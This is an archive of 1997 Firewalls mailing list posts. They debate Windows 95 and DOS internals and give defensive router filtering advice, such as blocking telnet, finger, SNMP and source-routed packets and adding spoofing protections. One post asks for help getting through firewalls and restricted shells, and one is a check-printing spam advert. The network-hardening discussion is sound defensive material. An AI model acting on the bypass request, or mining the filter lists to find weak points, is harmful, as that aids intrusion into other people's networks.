To: "'Firewalls (inet/GreatCircle)'" , "'Sebastian Stache'"
Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'"
Subject: RE: Re: NCSA != NCSC
Date: Fri, 10 Jan 1997 11:13:28 +1300
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sebastian Stache[SMTP:zeb@sbbs.se] Wrote:
>Wilner informed me that:
>> Everything except boot-up depends upon the O/S. Nothing is below the "O/S
>> layer," nor does one speak of such a layer unless one intends "application
>as well as
>> layer" and doesn't know an application from an O/S, nor can a single byte be
>> sent or retrieved over a device (networked or otherwise) unless an O/S is
>> relied upon, nor can a single access to memory, disk, or what-have-you be ...

>Now suppose I wanted to use Drivespace, an MS technique to
>compress harddisks on the fly. Or even better, Stacker, a 3rd-
>party equivalent. Either of these would install themselves
>BELOW Windows 95 (and even more interestingly, in some respects
>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS).
>To Windows 95 (and to DOS), the compression activities would
>be transparent, ie Windows would not *know* about them. Which
>of course is the whole point.

Bzzzst. Wrong.

When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. Here I'm talking about the DOS it uses to bootstrap the machine, load all "real mode" device drivers etc, not user started DOS sessions (which also run in separate x86 virtual machines). It heavily breakpoints this DOS code, and in fact will receive control back from DOS (without the DOS code's knowledge) at points it has determined it needs to; it will also catch many int calls to the BIOS and handle them in protected mode without "Real Mode DOS's" knowledge.

The BIOS and DOS aren't used for a hell of a lot any more (at least once '95 boots), not for Disk (unless no protected mode disk driver exists for the device), Screen, Keyboard, or Serial port I/O, and that's most of the BIOS. All these functions are handled by 32 bit protected mode device drivers which go straight to the hardware, and in almost all cases around DOS and the BIOS. There are exceptions to this: where Win95 has no protected mode driver for the device, it will use DOS and loaded device drivers effectively as the "device driver" to access the device. And calls to this "device driver" can end up back in the Win95 OS. Use of real mode DOS drivers is a choice, for backward compatibility, a choice you don't for example have with NT. However anyone who wants to set up Win95 for speed and stability will avoid real mode drivers like the plague.

With Win95, running the GUI is a choice, much like firing up X11 on top of Unix is; you can still have preemptively multitasked character mode sessions if you want to.

>I don't think there's any point in mentioning utilities that
>halt the computer when a virus is detected, or when battery
>status is low, or when the Debug-mode button is pressed, or
>when a source-routed packet arrives.

Well, under '95 these should (and are by all leading players) be implemented as 32 bit virtual device drivers. And a source routed packet is not going to get far on any OS without going thru the TCP/IP stack, which admittedly could be a real mode stack on 95, but that's not the sensible choice.

Win311 is an operating system; it offers preemptive multitasking, virtual memory, and controls the file system and most I/O devices. It has more in common with Win95 architecturally than one (particularly if that one is in Bill Gates' marketing dept.) may wish to think. The common misconception that windows 3.11 only offers cooperative multitasking stems from the fact that all Win16 apps are cooperatively multitasked within the same virtual machine and same address space, and all most users see is the cooperatively multitasking face of Win3.11; underneath, it's 32 bit, preemptive multitasking for virtual machines. This decision (UGH!) transfers forward to Win95 as well, which is why those wanting good stable Win95 performance avoid 16 bit apps like the plague as well. WinNT of course can run each 16 bit app in its own virtual machine (or a shared one if you choose).

Win95 is full of hacks and kludges, but for good reason, BACKWARD COMPATIBILITY. Users would have squawked long and loud about how "bad" or "incompatible" etc that Win95 was if all their 16 bit apps stopped running, and they could no longer use their WeeLee4000 CD-ROM drive, or EastClone9000 SCSI adapter just because no-one had written a protected mode driver for it yet.

You want a Microsoft OS without so many backward compatibility compromises? Get off 95 and onto NT.

Cheers, Matthew.

---------------------------------------------------------------------
Kiwitech Marine Solutions Ltd.
RaceTech, SailTech, PowerTech, Marine Software & Hardware
Web: http://www.kiwitech.co.nz, Email: mthomps1@kiwitech.co.nz
Phone: +64-9-307-0819 Fax: +64-9-307-6685 Mobile: +64-21-998-600
PO Box 5909, Wellesley Street, Auckland, New Zealand

From firewalls-owner Wed Jan 8 14:19:16 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA21467 for firewalls-outgoing; Wed, 8 Jan 1997 13:41:23 -0800 (PST)
Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA21455 for ; Wed, 8 Jan 1997 13:41:11 -0800 (PST)
Received: from kcann.taylormade.com (kcann.taylormade.com [205.226.160.70]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id NAA17764; Wed, 8 Jan 1997 13:40:36 -0800 (PST)
Message-ID: <32D412C5.42A2@ins.com>
Date: Wed, 08 Jan 1997 13:33:57 -0800
From: Kevin Cann
Reply-To: kevin_cann@INS.COM
Organization: ins.com.
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: uscny8hb@ibmmail.com
CC: Firewalls@GreatCircle.COM
Subject: Re: internal filtering router - filter config?
References: <199701080648.WAA21235@miles.greatcircle.com> <32D3A3BF.5D36@dreamscape.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Simply use the 'no ip source route' global router command.

Steven E. Matkoski wrote:
>
> Firewalls-Digest wrote:
> >
> > In your external router you'd block any ICMP traffic going back and
> > forth, as well as any packets bearing one of your internal IP addresses,
> > as a source address, especially if these are going INTO your protected
> > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
> > any ports that your users will not be using, and leave just mail, web,
> > ftp, etc.
> >
> > ricardo
> > ralvarado@avantel.com.mx
> >
> Thanks, I also read that you could block source-routed packets there,
> also.
> If I am using a cisco router, how does one go about this? or can I get a
> location for documentation.
>
> Thanks!
> -steve.
> matkoski@dreamscape.com

--
_____________________________________________________________
Kevin K. Cann, Network Systems Consultant
International Network Services
111 Deerwood Road #200, San Ramon, CA 94583
Pager: 1-888-587-3119 (510) 831-4743
"PROVIDING THE POWER OF OPERABLE NETWORKS"
_____________________________________________________________

From firewalls-owner Wed Jan 8 15:30:33 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27086 for firewalls-outgoing; Wed, 8 Jan 1997 15:15:17 -0800 (PST)
Received: from gamma.wantech.se (gamma.wantech.se [193.44.131.30]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA27050 for ; Wed, 8 Jan 1997 15:15:02 -0800 (PST)
Received: (qmail 2682 invoked by uid 503); 8 Jan 1997 23:14:37 -0000
Date: Thu, 9 Jan 1997 00:14:36 +0100 (MET)
From: Patrik Backstrom
X-Sender: pb@gamma.wantech.se
To: firewalls@greatcircle.com
Subject: Guardian 2.0 NAT on NT 4.0 troubles
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi everyone!

I haven't found a FAQ on the Guardian anywhere... is there one?

Anyway - I have installed Guardian Firewall 2.0 on a NT 4.0 machine, works fine.
But when I install the Guardian NAT on top of it, it suddenly refuses to let *any* traffic through the firewall. It doesn't matter what rules I add to either the Firewall or the NAT, it still refuses any traffic.

It's running on a Windows NT 4.0 Pentium machine, Service pack 1 & 2 installed, equipped with two 3COM 3C900 PCI 10MBit Ethernet cards.

Am I missing something that is obvious to everyone else? :-)

Hope somebody can help me with this...

/pb

---------------------------------------------------------
Patrik Bäckström        Phone.....: +46-(0)707-881928
Timgatan 3              Homepage..: http://www.klingon.pp.se
415 08 Göteborg         E-Mail....: pb@techno.org
Finger pb@techno.org for my PGP Public Key
---------------------------------------------------------

From firewalls-owner Wed Jan 8 17:59:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08403 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:36 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08381 for ; Wed, 8 Jan 1997 17:42:12 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ra138311 for ; Thu, 9 Jan 1997 02:41:46 +0100
Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.54867FF0@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:26 +0100
Message-ID: <01BBFDD6.54867FF0@ppp49.sbbs.se>
From: Sebastian Stache
To: "'Matthew Thompson'"
Cc: "'Firewalls (inet/GreatCircle)'"
Subject: RE: Re: NCSA != NCSC
Date: Thu, 9 Jan 1997 02:39:18 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Matthew Thompson wrote:
>With Win95, running the GUI is a choice, much like firing up X11 on top of
>Unix is, you can still have preemptively multitasked character mode sessions
>if you want to.

If you refer to Explorer.exe as the GUI, I agree, it's much like X-Window. Windows 95 is however NOT much like X-Window, since it provides almost every kind of functionality you'd expect from an operating system. X-Window is little more than a shell. Win95 provides disk cache, long filenames, pipes, mailslots, RPC, network services and much more.

To demonstrate this point, go to your nearest Win95 box and edit SYSTEM.INI. Replace this line

Shell=Explorer.exe

with

Shell=Command.com

Now when you start Windows, you'll have the equivalent (hrm, well) of a Bourne shell, with multi-tasking and all. Care to try X-Window? Type "explorer".

(I don't really think it matches neither Bourne nor X-Window.)

From firewalls-owner Wed Jan 8 17:59:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08402 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:32 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08376 for ; Wed, 8 Jan 1997 17:42:02 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id na138307 for ; Thu, 9 Jan 1997 02:41:43 +0100
Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.5258CA80@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:22 +0100
Message-ID: <01BBFDD6.5258CA80@ppp49.sbbs.se>
From: Sebastian Stache
To: "'Matthew Thompson'"
Cc: "'Firewalls (inet/GreatCircle)'" , "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'"
Subject: RE: Re: NCSA != NCSC
Date: Thu, 9 Jan 1997 02:21:51 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Matthew Thompson wrote:
>>Sebastian Stache[SMTP:zeb@sbbs.se] Wrote:
>>Now suppose I wanted to use Drivespace, an MS technique to
>>compress harddisks on the fly. Or even better, Stacker, a 3rd-
>>party equivalent. Either of these would install themselves
>>BELOW Windows 95 (and even more interestingly, in some respects
>>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS).
>>To Windows 95 (and to DOS), the compression activities would
>>be transparent, ie Windows would not *know* about them. Which
>>of course is the whole point.

>Bzzzst. Wrong.

>When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine.
>Here I'm talking about the DOS it uses to bootstrap the machine, load all
>"real mode" device drivers etc, not user started DOS sessions (which also
>run in separate x86 virtual machines). It heavily breakpoints this DOS
>code, and in fact will receive control back from DOS (without the DOS
>code's knowledge) at points it has determined it needs to, it will also
>catch many int calls to the BIOS and handle them in protected mode without
>"Real Mode DOS's" knowledge.

A few facts, if I may.

Real mode can never be "run in an x86 virtual machine". If the expression had been semantically correct, it would have been contradictive. When "Real Mode DOS" is running, the processor is in real mode. When a DOS-box is run under Win95, the processor is in protected mode, with the VM (Virtual Mode) flag set. HIMEM.SYS can be used to switch to protected mode in a controlled and cooperative manner. HIMEM.SYS is automatically loaded by the Win95 version of IO.SYS unless explicitly told not to.

Neither Drivespace nor Stacker are device drivers. The device driver for IDE devices resides in BIOS in modern (post-88) PCs. Both Drivespace and Stacker use a DOS extension technique to create new "virtual" devices with their own drive letters. The technique is exactly the same as MSCDEX and SUBST use. It is also exactly the same technique that is used by NET USE and Netware MAP.

In all of the above cases, we are creating file components which are treated as black boxes by Windows, the operating system. If I wanted to write my own version of NET.EXE, I would probably see to it that whenever a file containing the text "source routed packet" was requested to be stored on the remote host, I would triple-DES it. And Windows would not ever SEE this, since this functionality existed BELOW the operating system (Windows).

>Bzzzst. Wrong.

Wrong? Which word?

From firewalls-owner Wed Jan 8 18:30:25 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08765 for firewalls-outgoing; Wed, 8 Jan 1997 17:50:21 -0800 (PST)
Received: from wanggate (wanggate.wang.co.nz [192.58.229.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08752 for ; Wed, 8 Jan 1997 17:50:09 -0800 (PST)
Received: by wanggate (951211.SGI.8.6.12.PATCH1042/951211.SGI) for id OAA23893; Thu, 9 Jan 1997 14:49:28 +1300
Received: from wnx1(172.17.28.6) by wanggate via smap (3.1) id xma023877; Thu, 9 Jan 97 14:49:04 +1300
Received: by WNX1 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57) id <01BBFE3C.55BA34A0@WNX1>; Thu, 9 Jan 1997 14:49:37 +1300
Message-ID:
From: Mahesh Ravji
To: "'Firewalls@GreatCircle.COM'"
Subject: DNS forwarding to firewall
Date: Thu, 9 Jan 1997 14:49:35 +1300
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I'm having problems getting Sun's in.named to forward requests to our firewall. We have a Bordaware firewall and multiple secondary DNS located at various sites. All secondary DNS's are running Solaris 2.5 and need to be configured to forward queries they can't resolve to the firewall. I have added the 'forwarders' directive to the named.boot file which looks something like this:

; named boot file for secondary server
;
directory /var/named
;
; type        domain                  source host/file    backup file
cache         .                                           named.ca
forwarders    a.b.16.8
slave
primary       .                                           db..
secondary     some.domain             a.b.64.227          db.some.domain
secondary     b.a.IN-ADDR.ARPA        a.b.64.227          db.a.b
primary       0.0.127.IN-ADDR.ARPA                        db.127.0.0

The DNS resolves all internal requests but does not appear to forward names that it can't resolve to the firewall.

Has anyone else configured a similar setup in a Solaris environment?

TIA

Mahesh Ravji              Phone: +64 4 382-0100
Wang NZ Ltd.              Fax: +64 4 385-6067
195-201 Willis Street     E-Mail: Mahesh.Ravji@wang.co.nz
PO Box 6648
Wellington
New Zealand

From firewalls-owner Wed Jan 8 18:45:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA10212 for firewalls-outgoing; Wed, 8 Jan 1997 18:15:34 -0800 (PST)
Received: from mtigwc02.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10195; Wed, 8 Jan 1997 18:15:04 -0800 (PST)
Received: from Default ([153.35.0.194]) by mtigwc02.worldnet.att.net (post.office MTA v2.0 0613 ) with SMTP id AAD20151; Thu, 9 Jan 1997 00:33:40 +0000
From: printerm@softcell.net
Date: Wed, 08 Jan 1997 19:36:59 PST
Subject: CheckRite Laser Checks! (B)
Message-ID: <19970109003156.AAD20151@Default>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The (B) means "bulk class mail", we put that there so you will be able to tell that you have a bulk mail without having to open it. We also put that there so you can filter us out if you wish. Please put REMOVE in the subject and press reply if you do not wish to receive mail from us again.

CheckRite 2000 by Printerm
MICR LASER CHECK PRINTING
The fast approach to convert from Pre-printed checks to laser check printing
DOWNLOAD FREE DEMO SOFTWARE FROM OUR WEB SITE http://bisinc.com/printerm/

Conversion from costly pre-printed checks to lower cost laser technology may save you as much as 8 cents per check. Printerm offers you a software package which allows a smooth link-up between your Accounting Software and your Laser Printer. Laser printing eliminates costly outside check form printing bills and allows the use of blank paper stock. Laser check printing means you will not have to contend with stocking large quantities of pre-printed checks which can become obsolete because of address changes, company name and changes in financial institutions.

Printerm offers a full digitizing service to convert forms, logos and authorized signatures to digital data. These digitized items may be used on your mainframe computers or if you are using a HP LaserJet 4Plus, 4Si, 5 or 5Si printers they may be stored on a font cartridge or a flash simm. The font cartridge for the HP 4 series is simple to plug into the printer when check printing is required. The flash simm has to be mounted onto the MIO board in the HP LJ 5 and 5Si printers. HP Flash Cartridges and simms are programmed by Printerm with your check data and can assist you with your conversion program. FlashProm or simm products are available in various sizes from 256K up to 2MB. These products are reprogrammable to allow updating of data and can store forms, logos and authorized signatures for several different companies. Flash technology data storage allows your printer to print at maximum speed since there is no spooling delay of large files from your computer to the printer. You are able to print checks for several different companies with laser printing without experiencing delays caused by changing check stock. The MICR font provided by printerm is to ABA-X9 standards to ensure acceptance of your checks by banking institutions.

Security is easy with Printerm's approach to laser printing. Pre-printed blank checks which may be lost or stolen are no longer required. The HP FlashProm cartridge (used to store check forms, signatures and logos) and the MICR (Magnetic Ink) toner cartridge are easily removed and stored in a secure area preventing un-authorized use when check printing is not required.

The CheckRite 2000 package available from Printerm provides that essential back-up between your accounting software and the laser printer. CheckRite 2000 provides the software to allow printing of laser checks from a PC or Mainframe computer without having to buy MS-ACCESS, dBase or other software. Each laser check is numbered when the printing occurs and is easily audited with your accounting program.

Features of the CheckRite 2000
* Password security
* Scanned signatures and logos are printed as part of the check
* Account Screen maintains company and bank detail
* Print blank checks and check books
* Issue checks on demand for numerous companies and accounts
* Import Text/ASCII data into CheckRite 2000 database
* Historical log of checks printed with all details stored
* Print checks on Laser Bond check paper or standard laser paper

Printerm offers full support services to get your laser check printing operational
** MICR toner and HP LaserJet MICR printing Kits are also available from Printerm.

For further information please contact:
Charles Katz:Printerm Datascribe,Inc.| printerm@softcell.net
300 Pearl St., suite 200 | voice:716-842-3099
Buffalo,NY 14202 | Fax: 716-842-6049
WEB Site: http://bisinc.com/printerm/
Download a Free Demo now!!!!!
From firewalls-owner Wed Jan 8 19:15:12 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA12143 for firewalls-outgoing; Wed, 8 Jan 1997 19:04:02 -0800 (PST)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA12125 for ; Wed, 8 Jan 1997 19:03:33 -0800 (PST)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0viAle-0004FTC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 04:02:58 +0100 (MET)
Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 9 Jan 97 04:02 MET
Received: by lina id m0viAf1-0004j2C (Debian Smail-3.2 1996-Jul-4 #2); Thu, 9 Jan 1997 03:56:07 +0100 (MET)
Message-Id:
From: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: internal filtering router - filter config?
To: uscny8hb@ibmmail.com
Date: Thu, 9 Jan 1997 03:56:06 +0100 (MET)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <32D3A3BF.5D36@dreamscape.com> from "Steven E. Matkoski" at Jan 8, 97 08:40:15 am
X-Mailer: ELM [version 2.4 PL25 PGP2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

> Thanks, I also read that you could block source-routed packets there,
> also.

You should block them on the external router to protect your DMZ from spoofing attacks.

Usually an external (in front of DMZ/firewall) and an internal (after DMZ/firewall) filtering router will do the following (apart from routing of course :)

external:
    spoof protection
    DMZ protection
internal:
    spoof protection
    internal net protection
    snoop protection from DMZ/firewall

with:

spoof protection is
    block all packets with source address from inside on external interface
    block all packets with source address not from inside on internal interface
    block all reserved/not-routed networks
    block all unusual packages like broadcast and multicast and source routed
    block all oversized packages or broken packages

DMZ protection is
    allow only connections to sudden ports of the DMZ/firewall hosts

internal net protection is
    allow only connections to sudden/no ports of internal hosts
    optionally allow all outgoing connections

snoop protection
    don't let any internal->internal packets reach the DMZ/firewall

These are the general usage for those routers. Of course you can add additional tasks or leave some out, depending on your local security policy.

> If I am using a cisco router, how does one go about this? or can I get a
> location for documentation.

www.cisco.com and the CD which is delivered with your cisco router.

Greetings
Bernd

--  (OO)      --  Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de  --
   ( .. )   ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
    o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
  (O____O)   If privacy is outlawed only Outlaws have privacy

From firewalls-owner Wed Jan 8 23:43:24 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA26270 for firewalls-outgoing; Wed, 8 Jan 1997 23:15:48 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24956 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:54:48 -0800 (PST)
Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06301 for ; Tue, 7 Jan 1997 12:28:18 -0800 (PST)
From: uskanbye@ibmmail.com
Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23214; Tue, 7 Jan 1997 21:29:03 +0100
X-Mailer: XFMail 1.0 [p0] on Linux
Received: from relay3.UU.NET by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA32132; Mon, 6 Jan 1997 08:33:09 +0100
Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbxhe04920; Mon, 6 Jan 1997 02:30:36 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST)
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST)
X-Uidl: 852547705.003
Message-Id:
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST
Date: Tue, 31 Dec 1996 16:00:41 EST
X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
To: firewalls@greatcircle.com
Subject: Re: Air Force Web Site Hacked
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I don't agree with the premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical).

----------------WWW.INK.ORG\PUBLIC\KDHE-------------------
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
----------Mills Bldg Suite 501 Topeka, KS 66612-----------
---------Phone (913) 296-5643 FAX (913) 296-8943----------

*** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 ***

Date: Tue, 31 Dec 1996 11:41:27 -0800
From: Mark Johnson
To: Dale Drew
CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked

Dale Drew wrote:
>
> I don't see how CDROM provides significant advantages on a WEB server
> "graffiti" attack.
>
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT (or the user that owns
> the http process), and the system has some form of (or access to)
> writable media available.
>
> The attacker just repoints the httpd root tree to the writable media (eg;
> "/tmp") and away from the CDROM.
>
> http://www.security.mci.net
> ===============================================================
> Dale Drew                      MCI Telecommunications
> Sr. Manager                    internetMCI Security Engineering
> Voice: 703/715-7058            Internet: ddrew@mci.net
> Fax: 703/715-7066              MCIMAIL: Dale_Drew/644-3335
>
> At 11:57 PM 12/30/96 -0500, Michael Idengren wrote:
> >I don't know about the rest of you but I agree with the idea of putting a
> >webserver on a CD-ROM. I think the government can afford to write a new
> >CD every time they need to update someone's email address anyways :)
> >
> >Mike Idengren                    | MEISTER
> >---------------------------------+----------------------------------
> >Center for Information Technology| Alachua Free-Net IRC Administrator
> >Stetson University               | WorldWide Free-Net IRC Network Coordinator
> >
> >
> >
> >
> >

I have not set one up yet (Planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm or deny my thoughts?

Mark
--
Mark Johnson
Network Project Manager
St. Mary's Regional Med Ctr
mark@hercules.reno.nv.us

---- End of mail text

Additional SMTP headers from original mail item follow:

Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST
Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST)
Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST)
Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbasin.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PST)
Message-ID: <32C96C67.7D78@hercules.reno.nv.us>
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
References: <3.0.32.19961231124626.007717e4@166.45.1.38>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Wed Jan 8 23:44:41 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24931 for firewalls-outgoing; Wed, 8 Jan 1997 22:54:09 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24838 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:23 -0800 (PST)
Received: from id.co.zw (a3-jhb-65.dial-up.net [196.26.216.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA24866 for ; Tue, 7 Jan 1997 08:18:08 -0800 (PST)
Received: from miller.id.co.zw ([196.33.153.100]) by id.co.zw (8.6.11/8.6.9) with ESMTP id SAA13975 for ; Tue, 7 Jan 1997 18:15:08 +0200
Message-Id: <199701071615.SAA13975@id.co.zw>
From: "Sean Miller"
To:
Subject: Help in any of the folowing if at all possible
Date: Tue, 7 Jan 1997 16:05:01 +0200
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I need some help in getting through firewalls (and if anyone can on getting through shells with restricted access or access denied)

Please help.
Mark

From firewalls-owner Wed Jan 8 23:48:54 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA24886 for firewalls-outgoing; Wed, 8 Jan 1997 22:53:49 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id WAA24827 for firewalls@greatcircle.com; Wed, 8 Jan 1997 22:53:13 -0800 (PST)
Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA19840 for ; Tue, 7 Jan 1997 06:43:41 -0800 (PST)
Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC65.DC2C2E40@exch-bel1.attachmate.com>; Tue, 7 Jan 1997 06:41:49 -0800
Message-ID:
From: Darren Cromer
To: "'Ricardo Alvarado'" , "'firewalls@GreatCircle.COM'"
Subject: RE: internal filtering router - filter config?
Date: Tue, 7 Jan 1997 06:41:49 -0800
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Why ICMP? I'm curious what inherent risk that would present. I too am setting up a screening firewall, but I want to allow pings to traverse the external router. (any advice on how to filter all ICMP except pings?)

>----------
>From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx]
>Sent: Friday, January 03, 1997 10:20 AM
>To: firewalls@GreatCircle.COM
>Subject: Re: internal filtering router - filter config?
>
>>What type of things would you filter on the internal router? or even
>>the external router? I am going to be installing a firewall real soon
>>and would really appreciate any help.
>>
>>-steve.
>>matkoski@dreamscape.com
>
>In your external router you'd block any ICMP traffic going back and
